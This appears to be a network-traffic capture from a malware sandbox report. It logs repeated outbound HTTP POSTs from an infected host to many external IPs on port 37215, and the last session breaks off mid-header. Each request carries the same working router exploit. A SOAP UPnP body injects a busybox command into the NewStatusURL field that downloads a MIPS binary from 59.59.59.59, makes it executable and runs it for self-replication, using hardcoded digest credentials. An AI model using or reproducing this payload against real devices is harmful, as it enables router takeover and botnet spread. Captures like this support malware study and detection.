20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1502192.168.2.155328441.101.248.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879034996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1503192.168.2.1556596157.66.119.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879085064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1504192.168.2.1534856157.46.152.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879151106 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1505192.168.2.1550896147.170.47.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879163027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1506192.168.2.154007432.79.136.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879420042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1507192.168.2.153564841.141.215.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.879424095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1508192.168.2.153522441.243.54.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.910429001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1509192.168.2.155262441.207.112.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.910514116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1510192.168.2.153855641.168.88.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.910597086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1511192.168.2.1545262157.82.144.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881871939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1512192.168.2.155792041.161.101.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881884098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
